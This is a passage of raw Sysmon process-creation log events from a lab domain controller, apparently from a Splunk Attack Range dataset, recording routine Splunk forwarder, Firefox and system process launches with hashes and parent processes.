AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{A8622C2F-3E7B-6078-AB00-00000000AE01}1340C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000017540Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 13:42:23.486{A8622C2F-42BF-6078-0105-00000000AE01}2328C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{A8622C2F-3E7B-6078-AB00-00000000AE01}1340C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000017526Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 13:42:22.424{A8622C2F-42BE-6078-0005-00000000AE01}6840C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.0.2Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC{A8622C2F-3E7B-6078-AB00-00000000AE01}1340C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000017516Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 13:42:21.752{A8622C2F-42BD-6078-FF04-00000000AE01}6268C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.0.2Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165{A8622C2F-3E7B-6078-AB00-00000000AE01}1340C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000017506Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 13:42:21.080{A8622C2F-42BD-6078-FE04-00000000AE01}5400C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control ProgramWindows (R) Win 7 DDK driverWindows (R) Win 7 DDK providerSplunkMonNoHandle.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8{A8622C2F-3E7B-6078-AB00-00000000AE01}1340C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000017430Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 13:41:49.152{A8622C2F-429D-6078-FC04-00000000AE01}6876C:\Program Files\Mozilla Firefox\pingsender.exe87.0-FirefoxMozilla Foundationpingsender.exe"C:\Program Files\Mozilla Firefox\pingsender.exe" https://incoming.telemetry.mozilla.org/submit/telemetry/5bed5781-10fd-4cd5-9a1f-10a01c5fca2c/first-shutdown/Firefox/87.0/release/20210318103112?v=4 C:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\gtdf58bl.default-release\saved-telemetry-pings\5bed5781-10fd-4cd5-9a1f-10a01c5fca2cC:\Program Files\Mozilla Firefox\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92MediumMD5=2CA82B57DB86DB7E0E729E8A265BC7AA,SHA256=95770A446509CE22CA41D30DD0EFB3413CD61247358100D72B9BF3F71E1083B2,IMPHASH=AF27FA7223A9B6FE80447A0E6715E632{A8622C2F-428A-6078-EF04-00000000AE01}6992C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" 154100x800000000000000017419Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 13:41:49.132{A8622C2F-429D-6078-FA04-00000000AE01}5928C:\Program Files\Mozilla Firefox\pingsender.exe87.0-FirefoxMozilla Foundationpingsender.exe"C:\Program Files\Mozilla Firefox\pingsender.exe" https://incoming.telemetry.mozilla.org/submit/telemetry/9fea91cf-d53b-4c80-8527-2fc1379c73f3/event/Firefox/87.0/release/20210318103112?v=4 C:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\gtdf58bl.default-release\saved-telemetry-pings\9fea91cf-d53b-4c80-8527-2fc1379c73f3C:\Program Files\Mozilla Firefox\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92MediumMD5=2CA82B57DB86DB7E0E729E8A265BC7AA,SHA256=95770A446509CE22CA41D30DD0EFB3413CD61247358100D72B9BF3F71E1083B2,IMPHASH=AF27FA7223A9B6FE80447A0E6715E632{A8622C2F-428A-6078-EF04-00000000AE01}6992C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" 154100x800000000000000017407Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 13:41:49.084{A8622C2F-429D-6078-F804-00000000AE01}6872C:\Program Files\Mozilla Firefox\pingsender.exe87.0-FirefoxMozilla Foundationpingsender.exe"C:\Program Files\Mozilla Firefox\pingsender.exe" https://incoming.telemetry.mozilla.org/submit/telemetry/4031e1f7-1a1b-48f7-88fe-9dc3acd7fc18/new-profile/Firefox/87.0/release/20210318103112?v=4 C:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\gtdf58bl.default-release\saved-telemetry-pings\4031e1f7-1a1b-48f7-88fe-9dc3acd7fc18C:\Program Files\Mozilla Firefox\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92MediumMD5=2CA82B57DB86DB7E0E729E8A265BC7AA,SHA256=95770A446509CE22CA41D30DD0EFB3413CD61247358100D72B9BF3F71E1083B2,IMPHASH=AF27FA7223A9B6FE80447A0E6715E632{A8622C2F-428A-6078-EF04-00000000AE01}6992C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" 154100x800000000000000017005Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 13:41:35.440{A8622C2F-428F-6078-F704-00000000AE01}5168C:\Program Files\Mozilla Firefox\firefox.exe87.0FirefoxFirefoxMozilla Corporationfirefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="6992.35.63447139\1168973224" -childID 6 -isForBrowser -prefsHandle 4552 -prefMapHandle 2364 -prefsLen 11510 -prefMapSize 229564 -parentBuildID 20210318103112 -appdir "C:\Program Files\Mozilla Firefox\browser" - 6992 "\\.\pipe\gecko-crash-server-pipe.6992" 4764 tabC:\Program Files\Mozilla Firefox\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92LowMD5=A64451C6AB4EC7664C16F9AA082911B9,SHA256=EE77516268D63AC2CB4D76535F3B3BA04F085DE2F98FA32B45743FBB407B2A7E,IMPHASH=1627F1E69E2B2C24F8A7D08CC71D4B5E{A8622C2F-428A-6078-EF04-00000000AE01}6992C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" 154100x800000000000000016998Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 13:41:35.425{A8622C2F-428F-6078-F604-00000000AE01}6072C:\Program Files\Mozilla Firefox\firefox.exe87.0FirefoxFirefoxMozilla Corporationfirefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="6992.34.1338807210\1876676629" -childID 5 -isForBrowser -prefsHandle 4376 -prefMapHandle 4656 -prefsLen 11510 -prefMapSize 229564 -parentBuildID 20210318103112 -appdir "C:\Program Files\Mozilla Firefox\browser" - 6992 "\\.\pipe\gecko-crash-server-pipe.6992" 4684 tabC:\Program Files\Mozilla Firefox\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92LowMD5=A64451C6AB4EC7664C16F9AA082911B9,SHA256=EE77516268D63AC2CB4D76535F3B3BA04F085DE2F98FA32B45743FBB407B2A7E,IMPHASH=1627F1E69E2B2C24F8A7D08CC71D4B5E{A8622C2F-428A-6078-EF04-00000000AE01}6992C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" 154100x800000000000000016785Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 13:41:34.390{A8622C2F-428E-6078-F504-00000000AE01}6204C:\Program Files\Mozilla Firefox\firefox.exe87.0FirefoxFirefoxMozilla Corporationfirefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="6992.27.1350559162\1120258735" -childID 4 -isForBrowser -prefsHandle 3580 -prefMapHandle 3520 -prefsLen 2896 -prefMapSize 229564 -parentBuildID 20210318103112 -appdir "C:\Program Files\Mozilla Firefox\browser" - 6992 "\\.\pipe\gecko-crash-server-pipe.6992" 3592 tabC:\Program Files\Mozilla Firefox\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92LowMD5=A64451C6AB4EC7664C16F9AA082911B9,SHA256=EE77516268D63AC2CB4D76535F3B3BA04F085DE2F98FA32B45743FBB407B2A7E,IMPHASH=1627F1E69E2B2C24F8A7D08CC71D4B5E{A8622C2F-428A-6078-EF04-00000000AE01}6992C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" 154100x800000000000000016682Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 13:41:34.079{A8622C2F-428E-6078-F404-00000000AE01}5256C:\Program Files\Mozilla Firefox\firefox.exe87.0FirefoxFirefoxMozilla Corporationfirefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="6992.20.1884969510\718157581" -childID 3 -isForBrowser -prefsHandle 2936 -prefMapHandle 2932 -prefsLen 1505 -prefMapSize 229564 -parentBuildID 20210318103112 -appdir "C:\Program Files\Mozilla Firefox\browser" - 6992 "\\.\pipe\gecko-crash-server-pipe.6992" 2944 tabC:\Program Files\Mozilla Firefox\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92LowMD5=A64451C6AB4EC7664C16F9AA082911B9,SHA256=EE77516268D63AC2CB4D76535F3B3BA04F085DE2F98FA32B45743FBB407B2A7E,IMPHASH=1627F1E69E2B2C24F8A7D08CC71D4B5E{A8622C2F-428A-6078-EF04-00000000AE01}6992C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" 154100x800000000000000016619Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 13:41:33.965{A8622C2F-428D-6078-F304-00000000AE01}6964C:\Program Files\Mozilla Firefox\firefox.exe87.0FirefoxFirefoxMozilla Corporationfirefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="6992.13.911743561\1209229604" -childID 2 -isForBrowser -prefsHandle 2736 -prefMapHandle 2732 -prefsLen 1465 -prefMapSize 229564 -parentBuildID 20210318103112 -appdir "C:\Program Files\Mozilla Firefox\browser" - 6992 "\\.\pipe\gecko-crash-server-pipe.6992" 2744 tabC:\Program Files\Mozilla Firefox\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92LowMD5=A64451C6AB4EC7664C16F9AA082911B9,SHA256=EE77516268D63AC2CB4D76535F3B3BA04F085DE2F98FA32B45743FBB407B2A7E,IMPHASH=1627F1E69E2B2C24F8A7D08CC71D4B5E{A8622C2F-428A-6078-EF04-00000000AE01}6992C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" 154100x800000000000000016548Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 13:41:33.831{A8622C2F-428D-6078-F204-00000000AE01}3472C:\Program Files\Mozilla Firefox\firefox.exe87.0FirefoxFirefoxMozilla Corporationfirefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="6992.6.582201235\234433771" -childID 1 -isForBrowser -prefsHandle 2460 -prefMapHandle 2456 -prefsLen 1360 -prefMapSize 229564 -parentBuildID 20210318103112 -appdir "C:\Program Files\Mozilla Firefox\browser" - 6992 "\\.\pipe\gecko-crash-server-pipe.6992" 2440 tabC:\Program Files\Mozilla Firefox\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92LowMD5=A64451C6AB4EC7664C16F9AA082911B9,SHA256=EE77516268D63AC2CB4D76535F3B3BA04F085DE2F98FA32B45743FBB407B2A7E,IMPHASH=1627F1E69E2B2C24F8A7D08CC71D4B5E{A8622C2F-428A-6078-EF04-00000000AE01}6992C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" 154100x800000000000000016499Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 13:41:33.280{A8622C2F-428D-6078-F104-00000000AE01}6356C:\Program Files\Mozilla Firefox\firefox.exe87.0FirefoxFirefoxMozilla Corporationfirefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="6992.0.1983816045\1753010594" -parentBuildID 20210318103112 -prefsHandle 2000 -prefMapHandle 2012 -prefsLen 1 -prefMapSize 229564 -appdir "C:\Program Files\Mozilla Firefox\browser" - 6992 "\\.\pipe\gecko-crash-server-pipe.6992" 1580 gpuC:\Program Files\Mozilla Firefox\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92MediumMD5=A64451C6AB4EC7664C16F9AA082911B9,SHA256=EE77516268D63AC2CB4D76535F3B3BA04F085DE2F98FA32B45743FBB407B2A7E,IMPHASH=1627F1E69E2B2C24F8A7D08CC71D4B5E{A8622C2F-428A-6078-EF04-00000000AE01}6992C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" 154100x800000000000000016451Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 13:41:30.597{A8622C2F-428A-6078-EF04-00000000AE01}6992C:\Program Files\Mozilla Firefox\firefox.exe87.0FirefoxFirefoxMozilla Corporationfirefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92MediumMD5=A64451C6AB4EC7664C16F9AA082911B9,SHA256=EE77516268D63AC2CB4D76535F3B3BA04F085DE2F98FA32B45743FBB407B2A7E,IMPHASH=1627F1E69E2B2C24F8A7D08CC71D4B5E{A8622C2F-428A-6078-EE04-00000000AE01}7084C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" 154100x800000000000000016440Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 13:41:30.527{A8622C2F-428A-6078-EE04-00000000AE01}7084C:\Program Files\Mozilla Firefox\firefox.exe87.0FirefoxFirefoxMozilla Corporationfirefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" C:\Program Files\Mozilla Firefox\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=A64451C6AB4EC7664C16F9AA082911B9,SHA256=EE77516268D63AC2CB4D76535F3B3BA04F085DE2F98FA32B45743FBB407B2A7E,IMPHASH=1627F1E69E2B2C24F8A7D08CC71D4B5E{A8622C2F-41CC-6078-CC03-00000000AE01}5260C:\Windows\explorer.exeC:\Windows\Explorer.EXE /NOUACCHECK 154100x800000000000000016426Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 13:41:26.284{A8622C2F-4286-6078-ED04-00000000AE01}5028C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.0.2Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748{A8622C2F-3E7B-6078-AB00-00000000AE01}1340C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000016416Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 13:41:24.831{A8622C2F-4284-6078-EC04-00000000AE01}7036C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.0.2Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25{A8622C2F-3E7B-6078-AB00-00000000AE01}1340C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000016406Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 13:41:24.159{A8622C2F-4284-6078-EB04-00000000AE01}5536C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{A8622C2F-3E7B-6078-AB00-00000000AE01}1340C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000016397Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 13:41:23.487{A8622C2F-4283-6078-EA04-00000000AE01}1444C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{A8622C2F-3E7B-6078-AB00-00000000AE01}1340C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000016387Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 13:41:22.676{A8622C2F-4282-6078-E904-00000000AE01}4896C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.0.2Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC{A8622C2F-3E7B-6078-AB00-00000000AE01}1340C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000016375Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 13:41:21.925{A8622C2F-4281-6078-E804-00000000AE01}616C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.0.2Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165{A8622C2F-3E7B-6078-AB00-00000000AE01}1340C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000016365Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 13:41:21.112{A8622C2F-4281-6078-E704-00000000AE01}6796C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control ProgramWindows (R) Win 7 DDK driverWindows (R) Win 7 DDK providerSplunkMonNoHandle.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8{A8622C2F-3E7B-6078-AB00-00000000AE01}1340C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000016308Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 13:40:47.095{A8622C2F-425F-6078-E604-00000000AE01}1772C:\Windows\System32\rundll32.exe10.0.14393.4169 (rs1_release.210107-1130)Windows host process (Rundll32)Microsoft® Windows® Operating SystemMicrosoft CorporationRUNDLL32.EXEC:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -EmbeddingC:\Windows\system32\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=23DB802097F7B7E520E40068A7E68B14,SHA256=28DE7D3E8BF4B19E44063A4BFC2E7C30AE488CD9A1F63320ED374E14AAECA667,IMPHASH=7D1CE1BAFE48B63D9D19E8E0E5DF3E6C{A8622C2F-3DED-6078-0C00-00000000AE01}592C:\Windows\System32\svchost.exeC:\Windows\system32\svchost.exe -k DcomLaunch 154100x800000000000000016186Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 13:40:26.285{A8622C2F-424A-6078-E404-00000000AE01}5272C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.0.2Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748{A8622C2F-3E7B-6078-AB00-00000000AE01}1340C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000016176Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 13:40:24.879{A8622C2F-4248-6078-E304-00000000AE01}6156C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.0.2Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25{A8622C2F-3E7B-6078-AB00-00000000AE01}1340C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000016166Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 13:40:24.207{A8622C2F-4248-6078-E204-00000000AE01}4528C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{A8622C2F-3E7B-6078-AB00-00000000AE01}1340C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000016157Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 13:40:23.535{A8622C2F-4247-6078-E104-00000000AE01}6988C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{A8622C2F-3E7B-6078-AB00-00000000AE01}1340C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000016148Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 13:40:22.457{A8622C2F-4246-6078-E004-00000000AE01}4904C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.0.2Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC{A8622C2F-3E7B-6078-AB00-00000000AE01}1340C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000016135Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 13:40:21.785{A8622C2F-4245-6078-DF04-00000000AE01}7000C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.0.2Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165{A8622C2F-3E7B-6078-AB00-00000000AE01}1340C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000016125Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 13:40:21.113{A8622C2F-4245-6078-DE04-00000000AE01}4636C:\Program 